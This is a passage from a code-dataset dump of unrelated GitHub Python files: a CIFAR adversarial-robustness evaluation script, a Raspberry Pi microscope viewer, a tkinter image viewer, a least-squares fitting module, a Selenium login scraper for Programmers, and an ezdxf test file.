(model(X).data.max(1)[1] != y.data).float().sum()\n err_pgd = (model(X_pgd).data.max(1)[1] != y.data).float().sum()\n return err, err_pgd\n\n\ndef eval_adv_test_whitebox_spatial(model, device, test_loader):\n \"\"\"\n evaluate model by white-box 
attack\n \"\"\"\n model.eval()\n robust_err_total = 0\n natural_err_total = 0\n total = 0\n\n for data, target, unsup in test_loader:\n data, target = data.to(device), target.to(device)\n # pgd attack\n X, y = Variable(data, requires_grad=True), Variable(target)\n err_natural, err_robust = pgd_whitebox_spatial(model, X, y,\n max_rot=args.max_rot,\n max_trans=args.max_trans,\n eval=True)\n logging.info('err pgd (white-box): %g', err_robust.item())\n robust_err_total += err_robust\n natural_err_total += err_natural\n total += X.shape[0]\n natural_acc = 1.0 - (natural_err_total.item() / total)\n robust_acc = 1.0 - (robust_err_total.item() / total)\n logging.info(f'natural_accuracy: {natural_acc}')\n logging.info(f'robust_accuracy: {robust_acc}')\n stats = {'natural_accuracy': natural_acc, 'robust_accuracy': robust_acc}\n with open(os.path.join(output_dir, 'stats.json'), 'w') as outfile:\n json.dump(stats, outfile)\n\n\ndef main():\n # white-box attack\n logging.info('pgd white-box attack')\n checkpoint = torch.load(args.model_path)\n state_dict = checkpoint.get('state_dict', checkpoint)\n num_classes = checkpoint.get('num_classes', 10)\n normalize_input = checkpoint.get('normalize_input', False)\n model = get_model(args.model, num_classes=num_classes,\n normalize_input=normalize_input)\n if not all([k.startswith('module') for k in state_dict]):\n state_dict = {'module.' + k: v for k, v in state_dict.items()}\n if use_cuda:\n model = torch.nn.DataParallel(model).cuda()\n cudnn.benchmark = True\n model.load_state_dict(state_dict)\n\n eval_adv_test_whitebox_spatial(model, device, test_loader)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='PyTorch CIFAR Spatial Attack Evaluation')\n parser.add_argument('--dataset', type=str, default='cifar10',\n choices=DATASETS,\n help='The dataset')\n parser.add_argument('--test-batch-size', type=int, default=200, metavar='N',\n help='input batch size for testing (default: 200)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--max-rot', default=30, type=int, help='rotation angle')\n parser.add_argument('--max-trans', default=0.1071, type=float, help='translation')\n parser.add_argument('--num-steps', default=20,\n help='perturb number of steps')\n parser.add_argument('--step-size', default=0.003, type=float,\n help='perturb step size')\n parser.add_argument('--model-path',\n default='./checkpoints/model_cifar_wrn.pt',\n help='model for white-box attack evaluation')\n parser.add_argument('--white-box-attack', default=True,\n help='whether perform white-box attack')\n parser.add_argument('--model', '-m', default='wrn-34-10', type=str,\n help='name of the model')\n parser.add_argument('--output-suffix', '-o', default='', type=str,\n help='string to add to log filename')\n\n args = parser.parse_args()\n\n output_dir, checkpoint_name = os.path.split(args.model_path)\n epoch = int(re.search('epoch(\\d+)', checkpoint_name).group(1))\n\n logging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s | %(message)s\",\n handlers=[\n logging.FileHandler(os.path.join(output_dir,\n 'attack_epoch%d%s.log' %\n (epoch, args.output_suffix))),\n logging.StreamHandler()\n ])\n logger = logging.getLogger()\n\n logging.info('PGD attack')\n logging.info('Args: %s', args)\n\n # settings\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda 
else {}\n\n # set up data loader\n transform_test = transforms.Compose([transforms.ToTensor(), ])\n # testset = torchvision.datasets.CIFAR10(root='data', train=False,\n # download=True,\n # transform=transform_test)\n testset = SemiSupervisedDataset(base_dataset=args.dataset,\n train=False, root='data',\n download=True,\n transform=transform_test)\n test_loader = torch.utils.data.DataLoader(testset,\n batch_size=args.test_batch_size,\n shuffle=False, **kwargs)\n\n main()\n\n", "repo_name": "p-lambda/robust_tradeoff", "sub_path": "cifar/code/spatial_attack_cifar10.py", "file_name": "spatial_attack_cifar10.py", "file_ext": "py", "file_size_in_byte": 8863, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.is_available", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 27, "usage_type": "call"}, {"api_name": "spatial.transform", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 43, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 68, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 78, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 79, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 88, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 134, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 140, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 144, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 150, "usage_type": "call"}, {"api_name": "utils.get_model", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 159, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 160, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 160, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 
167, "usage_type": "call"}, {"api_name": "datasets.DATASETS", "line_number": 170, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 195, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 197, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 198, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path", "line_number": 201, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 204, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 206, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 208, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 212, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 213, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 217, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 217, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 217, "usage_type": "call"}, {"api_name": "datasets.SemiSupervisedDataset", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 225, "usage_type": "attribute"}]}
+{"seq_id": "22307824379", "text": "from __future__ import print_function\nfrom PIL import Image, ImageTk\nimport tkinter as tki\nimport threading\nimport cv2\nimport os, time\nimport picamera\nimport picamera.array \n\nclass MicroscopeApp:\n def __init__(self, picam, pibgr):\n # store the video stream object and output path, then initialize\n # the most recently read frame, thread for reading frames, and\n # the thread stop event\n self.picam = picam\n self.frame = None\n self.thread = None\n self.stopEvent = None\n self.pibgr = pibgr\n\n # initialize the root window and image panel\n self.root = tki.Tk()\n self.panel = None\n \n # create a button, that when pressed, will take the current\n # frame and save it to file\n btn = tki.Button(self.root, text=\"Snapshot!\", command=self.takeSnapshot)\n btn.pack(side=\"bottom\", fill=\"both\", expand=\"yes\", padx=10, pady=10)\n \n # start a thread that constantly pools the video sensor for\n # the most recently read frame\n self.stopEvent = threading.Event()\n self.thread = threading.Thread(target=self.videoLoop, args=())\n self.thread.start()\n \n # set a callback to handle when the window is closed\n self.root.wm_title(\"Microscope imaging\")\n self.root.wm_protocol(\"WM_DELETE_WINDOW\", self.onClose)\n\n def videoLoop(self):\n while not self.stopEvent.is_set():\n # grab the frame from the video stream and resize it\n self.picam.capture(self.pibgr, \"bgr\", use_video_port = \"True\")\n self.frame = self.pibgr.array\n frame_small = cv2.resize(self.frame, (420,300))\n \n # clear buffer(if not it occurs incorrect error)\n self.pibgr.truncate(0)\n \n image = Image.fromarray(frame_small)\n image = ImageTk.PhotoImage(image)\n\n # if the panel is not None, we need to initialize it\n if self.panel is None:\n self.panel = tki.Label(image=image)\n self.panel.image = image\n self.panel.pack(side=\"left\", padx=10, pady=10)\n \n # otherwise, simply update the panel\n else:\n self.panel.configure(image=image)\n self.panel.image = image \n\n def takeSnapshot(self):\n timestr = time.strftime(\"%Y%m%d_%H%M%S\");\n filename = \"microscope_{}.tiff\".format(timestr)\n cv2.imwrite(filename, self.frame)\n print(\"[INFO] saved {}\".format(filename))\n\n def onClose(self):\n # set the stop event, cleanup the camera, and allow the rest of\n # the quit process to continue\n print(\"[INFO] closing...\")\n self.stopEvent.set() \n self.root.quit() \n\nif __name__ == '__main__':\n \n # initialize the video stream and allow the camera sensor to warmup\n print(\"[INFO] warming up camera...\")\n picam = picamera.PiCamera()\n time.sleep(0.5)\n picam.resolution = (1640,1232)\n time.sleep(2)\n pibgr = picamera.array.PiRGBArray(picam)\n time.sleep(0.5)\n\n # start the app\n pba = MicroscopeApp(picam,pibgr)\n pba.root.mainloop()", "repo_name": "OISL-Yonsei/raspberrypi-cam", "sub_path": "microscope.py", "file_name": "microscope.py", "file_ext": "py", "file_size_in_byte": 3165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tkinter.Tk", "line_number": 22, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 27, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 32, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 50, "usage_type": 
"name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 51, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 67, "usage_type": "call"}, {"api_name": "picamera.PiCamera", "line_number": 81, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 84, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 85, "usage_type": "call"}, {"api_name": "picamera.array", "line_number": 85, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 86, "usage_type": "call"}]}
+{"seq_id": "35681261486", "text": "from tkinter import *\r\nfrom PIL import ImageTk, Image\r\n\r\nroot = Tk()\r\nimg1 = ImageTk.PhotoImage(Image.open(\"a.png\"))\r\nimg2 = ImageTk.PhotoImage(Image.open(\"b.png\"))\r\nimg3 = ImageTk.PhotoImage(Image.open(\"c.png\"))\r\nimg4 = ImageTk.PhotoImage(Image.open(\"d.png\"))\r\nimg5 = ImageTk.PhotoImage(Image.open(\"e.png\"))\r\nimg_list = [img1, img2, img3, img4, img5]\r\nimage_num = 0\r\ndef forward():\r\n global imageLabel, image_num, img_list\r\n image_num = image_num + 1\r\n print(f\"{image_num}\")\r\n if image_num == (len(img_list)):\r\n forward_btn = Button(root, text=\">>\", command=forward, state=DISABLED)\r\n forward_btn.grid(row=1, column=2)\r\n else:\r\n imageLabel.grid_forget()\r\n imageLabel = Label(root, image=img_list[image_num])\r\n forward_btn = Button(root, text=\">>\", command=forward)\r\n forward_btn.grid(row=1, column=2)\r\n imageLabel.grid(row=0, column=0, columnspan=3)\r\n\r\n\r\ndef back():\r\n global imageLabel, image_num, img_list\r\n if image_num<=0:\r\n back_btn = Button(root, text=\"<<\", command=back,state=DISABLED)\r\n back_btn.grid(row=1, column=0)\r\n else:\r\n imageLabel.grid_forget()\r\n image_num -= 1\r\n imageLabel = Label(root, image=img_list[image_num])\r\n forward_btn = Button(root, text=\">>\", command=forward)\r\n forward_btn.grid(row=1, column=2)\r\n imageLabel.grid(row=0, column=0, columnspan=3)\r\n\r\n\r\nimageLabel = Label(root, image=img_list[image_num])\r\nback_btn = Button(root, text=\"<<\", command=back)\r\nforward_btn = Button(root, text=\">>\", command=forward)\r\n\r\nimageLabel.grid(row=0, column=0, columnspan=3)\r\nback_btn.grid(row=1, column=0)\r\nforward_btn.grid(row=1, column=2)\r\nroot.mainloop()", "repo_name": "rayyan-24/Python-Resources", "sub_path": "Tkinter/7_image_viewer.py", "file_name": "7_image_viewer.py", "file_ext": "py", "file_size_in_byte": 1701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.ImageTk.PhotoImage", "line_number": 5, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 5, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 5, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 5, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 8, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 9, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}]}
+{"seq_id": "33470390842", "text": "#!/bin/python3\n\nfrom CrownstoneYodiwo import CrownstoneNode\n\nfrom pathlib import Path\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--configFile', default='nodeConfig.json', help='configuration file')\nargs = parser.parse_args()\nconfigFile = args.configFile\n\ncFile = Path(configFile)\nif cFile.is_file():\n node = CrownstoneNode()\n node.loadConfig(configFile)\n node.start()\nelse:\n print(\"Error: File \" + configFile + \" does not exist\")\n", "repo_name": "crownstone/yodiwo-crownstone-node", "sub_path": "bin/yodiwo-crownstone.py", "file_name": "yodiwo-crownstone.py", "file_ext": "py", "file_size_in_byte": 488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 13, "usage_type": "call"}, {"api_name": "CrownstoneYodiwo.CrownstoneNode", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "28385475811", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n\nweighted2D.py\nContains functions to perform weighted least squares linear fit when there\nis error in both the x and y directions\n\nReference: B. Reed \"Linear least-squares fits with errors in both\ncoordinates. II: Comments on parameter variances\", Am. J. Phys, 60, 1992\n\n\"\"\"\n\ndef mfunc(m, x_in, y_in):\n # MFUNC - function to be minimized in order to find best slope\n\n import numpy as np\n\n # Separate x and y from their weights\n x = x_in[:,0]\n y = y_in[:,0]\n Wxi = x_in[:,1]\n Wyi = y_in[:,1]\n\n # Calculate weight for each data point\n Wi = Wxi*Wyi/(m**2*Wyi+Wxi) # Eq 8\n\n # Weighted means and deviations from weighted means\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12\n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n # Minimization function (eq 19 from paper)\n g = (m**2*np.sum((Wi**2)*U*V/Wxi) + m*np.sum((Wi**2)*((U**2)/Wyi - \n (V**2)/Wxi)) - np.sum((Wi**2)*U*V/Wyi)) \n g = g**2\n\n return g\n \n\ndef wls2d(x, y, delx, dely):\n \"\"\" \n WLS2D Calculates the weighted least squares fit to a straight line when\n there are errors in both the x and y directions.\n\n Reference: B. Reed \"Linear least-squares fits with errors in both\n coordinates. II: Comments on parameter variances\", Am. J. Phys, 60, 1992\n\n fitparams = wls2d(x, y, delx, dely, flag);\n\n INPUTS\n x vector of independent data points\n y vector of dependent data points\n delx vector of uncertainties/errors in x points\n dely vector of uncertainties/errors in y points\n\n OUTPUT\n fitparams vector of fit parameters\n fitparams[0] best fit slope\n fitparams[1] best fit y intercept\n fitparams[2] uncertainty in slope\n fitparams[3] uncertainty in y-intercept\n\n Note: equation numbers from B. 
Reed's paper\n \"\"\"\n\n import numpy as np\n from numpy.matlib import repmat\n from scipy.optimize import fmin\n\n N = len(x)\n\n # Calculate weights and weighted means\n Wxi = 1/(delx**2)\n Wyi = 1/(dely**2)\n \n # Force vectors to be column vectors \n x.shape = (N,1)\n y.shape = (N,1)\n Wxi.shape = (N,1)\n Wyi.shape = (N,1)\n\n # Add weights as second columns to x and y\n xWxi = np.append(x, Wxi, axis=1)\n yWyi = np.append(y, Wyi, axis=1)\n\n # Use unweighted linear regression to find a slope initial guess\n m0 = ((N*np.sum(x*y) - np.sum(x)*np.sum(y))/(N*np.sum(x**2) - np.sum(x)**2))\n\n # Find best slope\n m = fmin(func=mfunc, x0=m0, args=(xWxi, yWyi,))\n\n\n # Calculate final weight for each data point\n Wi = Wxi*Wyi/(m**2*Wyi+Wxi) # Eq 8\n Wj = Wi\n\n # Weighted means & deviations from weighted means\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12\n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n # Calculate corresponding y-intercept (equation 13)\n c = ybar - m*xbar # Eq 13\n\n # Sum of weighted residuals\n S = np.sum(Wi*((V-m*U)**2)) # Eq 14\n\n # Use calculated data points\n lam = Wi*(c + m*x - y) # Eq 26\n x = x - lam*m/Wxi # Eq 24\n y = y + lam/Wyi # Eq 25\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12 \n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n\n # Calculate parameter derivatives (Appendix)\n W = np.sum(Wi) # Eq A10\n HH = -2*m/W*np.sum(Wi**2*V/Wxi) # Eq A11\n JJ = -2*m/W*np.sum(Wi**2*U/Wxi) # Eq A12\n AA = 4*m*np.sum(Wi**3*U*V/Wxi**2) - W*HH*JJ/m # Eq A3\n BB = -np.sum(Wi**2*(4*m*Wi/Wxi*(U**2/Wyi - V**2/Wxi) - 2*V*HH/Wxi + \n 2*U*JJ/Wyi)) # Eq A4\n CC = -np.sum(Wi**2/Wyi*(4*m*Wi*U*V/Wxi + V*JJ + U*HH)) # Eq A5\n delta = np.eye(N) # Kroneker Delta\n delmat = delta - repmat(Wj,1,N)/W\n DD = np.dot(delmat,(Wi**2*V/Wxi)) # Eq A6\n EE = 2*np.dot(delmat,(Wi**2*U/Wyi)) # Eq A7\n FF = np.dot(delmat,(Wi**2*V/Wyi)) # Eq A8\n GG = np.dot(delmat,(Wi**2*U/Wxi)) # Eq A9\n A = np.sum(Wi**2*U*V/Wxi) # Eq 19 & 20\n B = np.sum(Wi**2*(U**2/Wyi - V**2/Wxi)) # Eq 19 & 20\n dmdxj = -1*(m**2*DD + m*EE - FF)/(2*m*A + B - AA*m**2 + BB*m - CC) # Eq A1\n dmdyj = -1*(m**2*GG - 2*m*DD - 0.5*EE)/(2*m*A + B - AA*m**2 + BB*m - \n CC); # Eq A2 \n dcdxj = (HH - m*JJ - xbar)*dmdxj - m*Wj/W # Eq A13\n dcdyj = (HH - m*JJ - xbar)*dmdyj + Wj/W # Eq A14\n delm = np.sqrt(S/(N-2)*np.sum(1/Wyi*dmdyj**2 + 1/Wxi*dmdxj**2)) # Eq 21\n delc = np.sqrt(S/(N-2)*np.sum(1/Wyi*dcdyj**2 + 1/Wxi*dcdxj**2)) # Eq 21\n\n fitparams = np.concatenate((m, c))\n fitparams = np.append(fitparams, delm)\n fitparams = np.append(fitparams, delc)\n\n return fitparams\n\n", "repo_name": "tzsummerscales/linfit2Derrors", "sub_path": "weighted2D.py", "file_name": "weighted2D.py", "file_ext": "py", "file_size_in_byte": 4465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sum", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.optimize.fmin", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.sum", 
"line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 146, "usage_type": "call"}]}
+{"seq_id": "31175258628", "text": "from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\n\ndef progarmmers(id,pw):\n try:\n noopen = webdriver.ChromeOptions()\n noopen.add_argument(\"headless\")\n driver = webdriver.Chrome(ChromeDriverManager().install(),options=noopen)\n \n url = 'https://programmers.co.kr/account/sign_in?referer=https://school.programmers.co.kr/learn/challenges?order=recent&page=1'\n driver.get(url)\n # driver.maximize_window() # 화면을 열고 풀스크린으로 적용\n id_box = driver.find_element(by=By.XPATH,value='//*[@id=\"main-app-account\"]/div/div[2]/div/div[2]/div[1]/div/div[2]/div[2]/input')\n id_box.click()\n id_box.send_keys(id)\n\n pw_box = driver.find_element(by=By.XPATH,value='//*[@id=\"main-app-account\"]/div/div[2]/div/div[2]/div[1]/div/div[2]/div[4]/input')\n pw_box.click()\n pw_box.send_keys(pw)\n\n login_box = driver.find_element(by=By.CSS_SELECTOR,value='#main-app-account > div > div.CqFgmmYa7JLTXOn9RZNl > div > div._i_cm82hE96w0g1ww1rO > div.by9dgl6a9xm729a_4ynt > div > div.G7QZ1shWGosDZ1csHsNt > button')\n login_box.click()\n time.sleep(1)\n\n score = driver.find_element(by=By.XPATH, value='//*[@id=\"edu-service-app-main\"]/div/div[2]/article/div[2]/aside/div[1]/div/ul/li[2]/div[2]')\n return score.text\n except:\n return '아이디/비밀번호가 잘못되었습니다.'", "repo_name": "JunHeeMerong/JunBlog", "sub_path": "main/programmers.py", "file_name": "programmers.py", "file_ext": "py", "file_size_in_byte": 1548, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.ChromeOptions", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 9, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 11, "usage_type": "name"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 16, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 16, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 24, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 28, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "70791181288", "text": "from typing import cast, Union\n\nimport pytest\nimport ezdxf\nimport math\n\nfrom ezdxf.entities import Ellipse, Point, Arc\nfrom ezdxf.explode import angle_to_param\nfrom ezdxf.math import normalize_angle, Vector\n\n\n@pytest.fixture(scope='module')\ndef doc():\n d = ezdxf.new()\n blk = d.blocks.new('Test1')\n blk.add_line((0, 0), (1, 0))\n blk.add_line((0, 0), (0, 1))\n msp = d.modelspace()\n msp.add_blockref('Test1', (10, 10))\n msp.add_blockref('Test1', (20, 10), dxfattribs={'xscale': 2}) # yscale and zscale\n return d\n\n\n@pytest.fixture(scope='module')\ndef msp(doc):\n return doc.modelspace()\n\n\n@pytest.fixture(scope='module')\ndef entitydb(doc):\n return doc.entitydb\n\n\ndef test_01_virtual_entities(msp):\n blockrefs = msp.query('INSERT')\n blockref = blockrefs[0]\n\n virtual_entities = list(blockref.virtual_entities())\n assert len(virtual_entities) == 2\n\n e = virtual_entities[0]\n # Virtual entities should not be stored in the entity database.\n assert e.dxf.handle is None, 'handle should be None'\n # Virtual entities should not reside in a layout.\n assert e.dxf.owner is None, 'owner should be None'\n # Virtual entities should be assigned to the same document as the block reference.\n assert e.doc is blockref.doc\n\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (1, 0)\n\n e = virtual_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (0, 1)\n\n blockref = blockrefs[1]\n virtual_entities = list(blockref.virtual_entities(non_uniform_scaling=False))\n assert len(virtual_entities) == 0\n virtual_entities = list(blockref.virtual_entities(non_uniform_scaling=True))\n assert len(virtual_entities) == 2\n\n e = virtual_entities[0]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (2, 0), 'should apply xscale 2'\n\n e = virtual_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (0, 1), 'should apply yscale 1'\n\n\ndef test_02_explode_blockrefs(doc, msp, entitydb):\n blockrefs = msp.query('INSERT')\n blockref = blockrefs.first\n blockref_owner = 